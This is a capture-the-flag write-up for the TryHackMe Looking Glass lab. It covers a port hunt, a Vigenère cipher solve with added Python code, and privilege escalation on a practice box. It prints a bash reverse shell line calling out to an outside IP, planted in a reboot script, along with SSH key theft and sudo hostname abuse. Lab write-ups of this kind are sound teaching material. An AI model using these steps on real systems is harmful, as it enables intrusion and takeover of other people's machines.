WriteUp — THM Looking Glass
Step through the looking glass. A sequel to the Wonderland challenge room.
This is a writeup for the TryHackMe room Looking Glass. My writeup for the first part of the Lewis Carroll themed series can be found here.
Reconnaissance
Start with an nmap scan to see the open ports and services. It reveals a ton of open ports, all identified as SSH. I need to check the ports individually, so I dump them into a file:
nmap --open lookingglass.thm | grep /tcp | cut -d '/' -f1 > ports.txt
Try to get something with HTTP:
while read p; do
curl http://lookingglass.thm:$p
done < ports.txt
Every port replies with:
curl: (1) Received HTTP/0.9 when not allowed
So let’s try SSH:
ssh -o "StrictHostKeyChecking=no" lookingglass.thm -p 11111
Warning: Permanently added '[lookingglass.thm]:11111,[10.10.40.255]:11111' (RSA) to the list of known hosts.
Higher
That’s an unusual reply. Maybe I need to find the right port? Let’s try with the highest port:
ssh -o "StrictHostKeyChecking=no" lookingglass.thm -p 13783
Higher
Connection to lookingglass.thm closed.
What about the lowest port?
ssh -o "StrictHostKeyChecking=no" lookingglass.thm -p 9000
Lower
Connection to lookingglass.thm closed.
Maybe the instructions are reversed? Let's find the right port with a binary search, following each reply in the opposite direction. I also found out that you need to include ports that were not in the nmap scan, and eventually you arrive at the right port (it is different for each box):
ssh -o "StrictHostKeyChecking=no" lookingglass.thm -p 10569
Warning: Permanently added '[lookingglass.thm]:10569,[10.10.40.255]:10569' (RSA) to the list of known hosts.
You’ve found the real service.
Solve the challenge to get access to the box
Jabberwocky
‘Mdes mgplmmz, cvs alv lsmtsn aowil
Fqs ncix hrd rxtbmi bp bwl arul;
Elw bpmtc pgzt alv uvvordcet,
Egf bwl qffl vaewz ovxztiql.
‘Fvphve ewl Jbfugzlvgb, ff woy!
Ioe kepu bwhx sbai, tst jlbal vppa grmjl!
Bplhrf xag Rjinlu imro, pud tlnp
Bwl jintmofh Iaohxtachxta!’
Oi tzdr hjw oqzehp jpvvd tc oaoh:
Eqvv amdx ale xpuxpqx hwt oi jhbkhe —
Hv rfwmgl wl fp moi Tfbaun xkgm,
Puh jmvsd lloimi bp bwvyxaa.
Eno pz io yyhqho xyhbkhe wl sushf,
Bwl Nruiirhdjk, xmmj mnlw fy mpaxt,
Jani pjqumpzgn xhcdbgi xag bjskvr dsoo,
Pud cykdttk ej ba gaxt!
Vnf, xpq! Wcl, xnh! Hrd ewyovka cvs alihbkh
Ewl vpvict qseux dine huidoxt-achgb!
Al peqi pt eitf, ick azmo mtd wlae
Lx ymca krebqpsxug cevm.
‘Ick lrla xhzj zlbmg vpt Qesulvwzrr?
Cpqx vw bf eifz, qy mthmjwa dwn!
V jitinofh kaz! Gtntdvl! Ttspaj!’
Wl ciskvttk me apw jzn.
‘Awbw utqasmx, tuh tst zljxaa bdcij
Wph gjgl aoh zkuqsi zg ale hpie;
Bpe oqbzc nxyi tst iosszqdtz,
Eew ale xdte semja dbxxkhfe.
Jdbr tivtmi pw sxderpIoeKeudmgdstd
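The port hunt from the Reconnaissance section, automated as an added example (this is my code, not part of the original writeup). The hints on this box run the opposite way, so "Higher" means the real service sits on a numerically lower port; the ssh probe assumes the hint arrives on stdout or stderr, and the offline demo uses a simulated service on port 10569, the port this particular box used.

```python
import subprocess
from typing import Callable, Optional, Tuple

def ssh_banner(host: str, port: int, timeout: int = 5) -> str:
    """Return the first line the fake SSH service prints (e.g. 'Higher').
    Assumes the hint is written to stdout or stderr; not used offline."""
    proc = subprocess.run(
        ["ssh", "-o", "StrictHostKeyChecking=no", "-o", "BatchMode=yes",
         "-o", f"ConnectTimeout={timeout}", "-p", str(port), host],
        capture_output=True, text=True, timeout=timeout + 10)
    lines = [l for l in (proc.stdout + proc.stderr).splitlines()
             if l and not l.startswith("Warning:")]
    return lines[0] if lines else ""

def find_port(oracle: Callable[[int], str], lo: int, hi: int,
              reversed_hints: bool = True) -> Tuple[Optional[int], int]:
    """Binary search over [lo, hi]; oracle(port) returns 'Higher', 'Lower'
    or any other text, which counts as the real service answering.
    Returns (port, number_of_probes); port is None if nothing matched."""
    probes = 0
    while lo <= hi:
        mid = (lo + hi) // 2
        reply = oracle(mid)
        probes += 1
        if reply not in ("Higher", "Lower"):
            return mid, probes
        go_up = reply == "Higher"        # literal meaning of the hint
        if reversed_hints:               # on this box the hints are swapped
            go_up = not go_up
        if go_up:
            lo = mid + 1
        else:
            hi = mid - 1
    return None, probes

def simulated_box(real_port: int) -> Callable[[int], str]:
    """Offline stand-in that answers like the challenge box: a port above
    the real one says 'Higher', a port below it says 'Lower'."""
    def oracle(port: int) -> str:
        if port == real_port:
            return "You've found the real service."
        return "Higher" if port > real_port else "Lower"
    return oracle

if __name__ == "__main__":
    port, probes = find_port(simulated_box(10569), 9000, 13783)
    print(f"real service on port {port} after {probes} probes")
```

Against a live box, pass `lambda p: ssh_banner("lookingglass.thm", p)` as the oracle; the search needs at most 13 connections for the 9000-13783 range instead of one per open port.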
Gaining access
This must be the Jabberwocky poem from the book Through the Looking-Glass. Comparing the second word of the poem, "brillig", to the ciphertext "mgplmmz" shows that this is not a simple monoalphabetic substitution cipher: the repeated letters in "brillig" map to different ciphertext letters. Let's check whether it is a Vigenère cipher with an online tool: https://www.dcode.fr/vigenere-cipher
We can use the known-plaintext method and supply a long word like "Bandersnatch". This quickly reveals that the text is Vigenère encrypted and the key is "THEALPHABETCIPHER". Using the same tool the text can be decrypted, and it reveals the secret to be "__REDACTED__". Let's enter that at the shell prompt. The program replies with a line before closing the connection:
jabberwock:SidesPracticeWatchedUproar
This password is generated dynamically for each machine, so showing it here is not a spoiler. I test logging in over SSH with these credentials and gain access as jabberwock. The user flag is stored reversed, so I get the right flag using:
rev user.txt
thm{__REDACTED__}
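The two steps the dCode tool performed above, as an added example (my code, not from the original writeup): the known-plaintext step subtracts the crib "Bandersnatch" from its ciphertext "Iaohxtachxta" (the line "Bwl jintmofh Iaohxtachxta!") to recover a rotation of the key, and the decrypt step applies the recovered key to the first two ciphertext lines quoted from the challenge output.

```python
import string

ALPHA = string.ascii_uppercase
KEY = "THEALPHABETCIPHER"          # key recovered in the writeup

# First two lines of the ciphertext exactly as the service printed them;
# the poem is one continuous key stream, so newlines are kept in place.
SAMPLE = ("Mdes mgplmmz, cvs alv lsmtsn aowil\n"
          "Fqs ncix hrd rxtbmi bp bwl arul;")

def vigenere_decrypt(ciphertext: str, key: str) -> str:
    """Classic Vigenère: the key advances only on letters, so case,
    spaces and punctuation pass through unchanged."""
    out, k = [], 0
    for ch in ciphertext:
        if ch.isalpha():
            shift = ALPHA.index(key[k % len(key)].upper())
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            k += 1
        else:
            out.append(ch)
    return "".join(out)

def key_stream_from_crib(cipher_word: str, plain_word: str) -> str:
    """Known-plaintext step: key letter = cipher letter - plain letter (mod 26).
    The result is the key read from whatever offset the crib sits at."""
    return "".join(ALPHA[(ALPHA.index(c.upper()) - ALPHA.index(p.upper())) % 26]
                   for c, p in zip(cipher_word, plain_word))

def fragment_fits_key(fragment: str, key: str) -> bool:
    """A crib recovers the key at an unknown offset, i.e. a substring of the
    key written twice; this is the consistency check the tool applies."""
    return fragment in key + key

if __name__ == "__main__":
    fragment = key_stream_from_crib("Iaohxtachxta", "Bandersnatch")
    print(fragment, fragment_fits_key(fragment, KEY))
    print(vigenere_decrypt(SAMPLE, KEY))
```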
Privesc
I start looking for privilege escalation vectors using linPEAS. Interesting findings:
At reboot a script is executed:
@reboot tweedledum bash /home/jabberwock/twasBrillig.sh
Jabberwock can reboot the system:
User jabberwock may run the following commands on looking-glass:
(root) NOPASSWD: /sbin/reboot
The script lives in jabberwock's home directory but runs as tweedledum at every reboot, and jabberwock can trigger a reboot with sudo. To get an interactive session, I edit the script to run a reverse shell and then reboot the system:
bash -i >& /dev/tcp/10.8.108.247/4444 0>&1
After the reboot is completed I get a shell as tweedledum. There is an interesting file in his home directory:
cat humptydumpty.txt
The file contains a long hex string (omitted here). I paste this text into CyberChef and convert it from hex. The decoded text is mostly garbled, but the last bytes are interesting:
the password is zyxwvutsrqponmlk
I test whether I can log in as humptydumpty with this password. It doesn't work over SSH, but switching user with su does:
su - humptydumpty
Enumerating as humptydumpty, there is another poem in his home directory where Humpty Dumpty explains the Jabberwocky poem to Alice. Which is good, because I was already starting to question my English skills.
Enumerating the system further, I notice interesting permissions on alice's home directory:
ls -la
total 32
drwxr-xr-x 8 root root 4096 Jul 3 01:25 .
drwxr-xr-x 24 root root 4096 Jul 2 23:24 ..
drwx--x--x 6 alice alice 4096 Jul 3 02:53 alice
drwx------ 4 humptydumpty humptydumpty 4096 Oct 25 09:56 humptydumpty
drwxrwxrwx 5 jabberwock jabberwock 4096 Oct 25 09:43 jabberwock
drwx------ 5 tryhackme tryhackme 4096 Jul 3 03:00 tryhackme
drwx------ 3 tweedledee tweedledee 4096 Jul 3 02:42 tweedledee
drwx------ 2 tweedledum tweedledum 4096 Jul 3 02:42 tweedledum
I cannot list the directory because it lacks the read bit for others, but the execute bit means I can still access a file if I guess its name, so I try names like flag.txt and poem.txt. I also check for an SSH private key:
cat /home/alice/.ssh/id_rsa
To my surprise I get the key, and it is not even passphrase protected. I copy the key to a file and log in as alice:
ssh -i id_rsa_alice alice@lookingglass.thm
I enumerate the system again with linPEAS but don't find any escalation vectors. There must be something about alice, though, so I search for files with different parameters: user=alice, group=alice and even grep -Ril "alice" /. Finally I stumble on something useful with:
find / -iname "*alice*" 2>/dev/null
/etc/sudoers.d/alice
This file is world-readable, so we can take a look:
cat /etc/sudoers.d/alice
alice ssalg-gnikool = (root) NOPASSWD: /bin/bash
So there we go! The sudoers entry only applies on the host ssalg-gnikool (looking-glass spelled backwards), and sudo's -h option lets me supply that hostname:
sudo -h ssalg-gnikool /bin/bash
whoami
root
Now just grab the root flag and we are done! Another very well done room, thank you NinjaJc01! Just need to get the Humpty Dumpty rhyme out of my head now…